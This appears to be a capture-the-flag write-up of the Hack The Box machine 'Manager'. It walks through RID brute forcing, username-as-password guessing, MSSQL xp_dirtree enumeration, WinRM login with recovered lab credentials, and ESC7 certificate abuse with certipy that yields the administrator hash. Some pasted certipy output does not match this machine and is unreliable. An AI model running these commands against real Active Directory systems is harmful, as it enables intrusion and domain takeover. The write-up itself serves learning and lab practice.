#windows #AD #medium #mssql #rid #brutefore #Certificate_Services #winrm #ESC7 #smb
About Manager
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. Thexp_dirtree
procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.# IP of the machine -> “10.10.11.236”
Recon
Let’s run an Nmap scan to discover any open ports on the remote host.
# Nmap 7.94SVN scan initiated Tue Mar 19 04:22:20 2024 as: nmap -sC -sV -oA nmap_manager 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up (0.26s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-19 15:22:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-19T15:24:06+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-19T15:24:07+00:00; +7h00m01s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-19T12:04:31
|_Not valid after: 2054-03-19T12:04:31
|_ssl-date: 2024-03-19T15:24:06+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-19T15:24:06+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-19T15:24:07+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-19T15:23:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 19 04:24:10 2024 -- 1 IP address (1 host up) scanned in 110.50 seconds
-> As per the Nmap result, we see that 53 ports were open and its version was “simple DNS plus” as well as 80 ports were also open which is some kind of “IIS”.
So it gives us a hint that we are dealing with some kind of Active directory.
when we checked the later port we found 389 LDAP ports were open also we found two DNS names from the result-> 1. “manager.htb”,2. “dc01.manager.htb”
So I quickly add both the dns names to my host file
we also found that RPC, SMB ,MSSQL port was also open in that Machine.
AS per MSSQL port was open which gives us a hint regarding ==**”kerberoasting”**==
And the more important thing is there is ==”**Clock-skew**”==, right now it’s not important stuff, but when we go for kerberoasting stuff, we make sure the clock is in sync.
Let’s start with the Website
It seems to be a static HTML Website Because all the links point back to themselves. so nothing interesting here. so I am not going to waste my time by doing content brute force.
SMB
Now, let’s proceed with enumerating the SMB shares, we are using smbclient tool to list all the shares available, there is not any unique share available from an authentication standpoint.
kerberoasting
So I tried to enumerate users via kerbrute
Make sure Kerbrute is installed on your system, here I am using the word list as “xato-net-10-million-usernames.txt” from Seclist
Here kerbrute is trying to do the pre-authentication
If some of you didnot know what kerberos pre authentication ?
Kerberos pre-authentication is a security feature designed to prevent password-guessing attacks.
“Pre-authentication adds an extra step before the KDC grants the TGT. During pre-authentication, the client (usually your computer) proves it knows the password for the requested username. Here’s how it typically works:
1. The client sends a request to the KDC containing the username.
2. **If pre-authentication is enabled:**
— The KDC challenges the client with a timestamp.
— The client encrypts the timestamp using its secret key (derived from the password) and sends it back to the KDC.
3. The KDC decrypts the timestamp using the password hash stored for the username (retrieved from a directory service like Active Directory).
4. If the decrypted timestamp matches the original one, the KDC trusts that the client knows the password and proceeds with issuing the TGT.”
Let me explain to you through tools also, Here we are using Netexec
- > Let's suppose somehow we get a valid user name for this domain so we try to authenticate with the domain without knowing the right password, then that time, we will get the error “KDC_ERR_PREAUTH_FAILED”
- ->but if we don’t have the valid user as well as password in that scenario we will get this error “KDC_ERR_C_PRINCIPAL_UNKNOWN”
Hope you get what Kerbute is doing behind the bar.
With the help of Kerbrute, we get some valid usernames. Here I face one of the main problems is time, like it’s a time-consuming process also suppose if some of the valid usernames weren’t present in your brute force list, then in that scenario we will never get the valid user name in your result list.
In this kind scenario, we can use RID brute force, this technique is very easy as well as not time-consuming, you will get a valid username within some min, and the most important point you even don’t need to provide the right brute force user list.
What is rid brute forcing
- Each user account in Active Directory has a unique Security Identifier (SID).
- SIDs are further composed of a Domain SID (identifies the domain) and a Relative Identifier (RID) — a unique number assigned to the user account within that domain
- The Attack Method:
- Null Session: The attacker establishes a null session with the domain controller. A null session doesn’t require authentication, providing a foothold for the attack.
- RID Cycling: The attacker attempts to guess RIDs sequentially. For each guess, they try to establish a connection using a combination of the known username and the guessed RID.
- Verification: If the guessed RID is valid (i.e., belongs to an existing user account), the domain controller might respond differently, revealing information to the attacker. This can be a subtle difference, but automated tools can detect these variations.
- Password Spraying: Once a valid RID is identified, the attacker might use it in conjunction with a list of common passwords (password spraying) to crack the actual user account password.
Command LIne -> netexec smb 10.10.11.236 -u ‘catnew’ -p ‘’ — rid-brute
-> With the help of that rid brute forcing we get a valid username within some seconds, it is time to filter the result and save only the username.
I just save all the results into the All_user_name.txt file and after that apply a filter to extract only the username.
Here is my final command for filtering ->
cat All_user_name.txt | grep “User”| awk ‘{print $6}’ |awk -F\\ ‘{print $2}’| sort -u
Also if you want to erase all the usernames that end with “$”, and if you want to change all the values to be in lowercase, then you can use this command line ->
`cat All_user_name.txt | grep “User”| awk ‘{print $6}’ |awk -F\\ ‘{print $2}’| sort -u | grep -v “\$$” | tee user_list.txt| tr [A-Z] [a-z] user_list.txt | tee user_list.txt`
I think it’s the better approach, it’s very easy and quick and most imp you do not need even a wordlist also to get a valid user name.
So, until now, we have a valid user, it’s time for a valid password.
Sometimes in most of the active directory environments, the user is also going to be its password
Here I am not doing password spraying or brute force attack
==I am just simply trying to guess the password using their own username .==
Commandline ->
netexec smb 10.10.11.236 -u User_list -p User_list — no-bruteforce — continue-on-success
So finally we got some valid usernames as well as some passwords for that username
let’s see what can we achieve using
using domain: domain cred we got “Access denied”
using operator: operator cred we got access, but nothing seems to be important here.
->As we remember mssql port was open on this device, let’s explore it
I used the cred of domain: domain got the same access denied error
but when I used operator: operator we got the access. but running command through “Netexec” is kind of wired for mssql , because we did not get an interactive shell.
So I use Impacket for that
Command line ->impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth
woo-hoo, we got the access, but when I tried to run any command I got the permission denied error.
but there is the command “xp_dirtree”, for this command, we don’t need any kind of access to run this.
As per the folder details, we can see “inetpub” folder was there, when I enumerated more, I found one .zip whose name was “website-backup-27–07–23-old.zip “ present in this folder.
as this file is present in inetpub folder we can access it via the website
xp_dirtree c:\inetpub\wwwroot
I just downloaded the .zip file from the website
or you can do it by wget http://manager.htb/website-backup-27-07-23-old.zip
after that, I just unzip the file [unzip website-backup-27-07-23-old.zip
], after that when we checked the hidden file in this folder, I found one interesting filename ".old-conf.xml".
when we open the file we get the ID and password of the user “raven” ❤💲🆗🏴☠️
I reverify the cred in through netexec for smb ,but there is no interesting share is availed for this user
But when I checked another method to log in for this cred, I found we were able to log in by “Winrm”
Command line ->netexec winrm 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
So, I quickly spawned the evil-winrm ,Boom, we got our first user Flag
Command line ->
evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
So, it’s time for a root flag
if you remember the machine description it talked about “Active Directory Certificate Services”
it seems to be some kind of vuln related to Certificate service
So I run certipy to check whether any vuln present for any certificates
command line ->
certipy-ad find -dc-ip 10.10.11.236 -u raven -p ‘R4v3nBe5tD3veloP3r!123’ -stdout -vulnerable
Certipy v4.7.0 — by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for ‘manager-DC01-CA’ via CSRA
[*] Got CA configuration for ‘manager-DC01-CA’
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023–07–27 10:21:05+00:00
Certificate Validity End : 2122–07–27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
[!] Vulnerabilities
==ESC7== : ‘MANAGER.HTB\\Raven’ has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
As per the Result, it seems to be some kind of Vuln related to ESC7, I just google and found one article from Hack Tricks about it.
I just followed the all step which is mention in Hack tricks blog and i got the HASH of administrator
certipy find -u raven -p ‘R4v3nBe5tD3veloP3r!123’ -dc-ip 10.10.11.236 -stdout -vulnerable
certipy ca -ca ‘manager-DC01-CA’ -add-officer raven -username raven@manager.htb -password ‘R4v3nBe5tD3veloP3r!123’
Certipy v4.0.0 — by Oliver Lyak (ly4k)
[*] Successfully added officer ‘John’ on ‘corp-DC-CA’
# List templates
certipy ca -username raven@manager.htb -password Passw0rd! -target-ip ca.corp.local -ca ‘corp-CA’ -enable-template ‘SubCA’
## If SubCA is not there, you need to enable it
# Enable SubCA
certipy ca -ca ‘manager-DC01-CA’ -enable-template SubCA -username raven@manager.htb -password ‘R4v3nBe5tD3veloP3r!123’
Certipy v4.0.0 — by Oliver Lyak (ly4k)
[*] Successfully enabled ‘SubCA’ on ‘corp-DC-CA’
certipy req -username raven@manager.htb -password ‘R4v3nBe5tD3veloP3r!123’ -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.0.0 — by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 — CERTSRV_E_TEMPLATE_DENIED — The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 785
Would you like to save the private key? (y/N) y
[*] Saved private key to 785.key
[-] Failed to request certificate
certipy ca -ca ‘manager-DC01-CA’ -issue-request 785 -username raven@manager.htb -password ‘R4v3nBe5tD3veloP3r!123’
Certipy v4.0.0 — by Oliver Lyak (ly4k)
[*] Successfully issued certificate
certipy req -username raven@manager.htb -password ‘R4v3nBe5tD3veloP3r!123’ -ca corp-DC-CA -target ca.corp.local -retrieve 785
Certipy v4.0.0 — by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 785
[*] Successfully retrieved certificate
[*] Got certificate with UPN ‘administrator@corp.local’
[*] Certificate has no object SID
[*] Loaded private key from ‘785.key’
[*] Saved certificate and private key to ‘administrator.pfx’Certipy v4.7.0 — by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT…
[*] Got TGT
[*] Saved credential cache to ‘administrator.ccache’
[*] Trying to retrieve NT hash for ‘administrator’
[*] Got hash for ‘administrator@manager.htb’: aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
if you get any kind of clock skew error ,use this command
sudo ntpdate -u manager.htb
I hope you enjoy and also learn new things from that machine ;;;
If you think that writeups help you ;
Then share with other security researchers….
KEEP HACKING, KEEP LEARNING”😎😎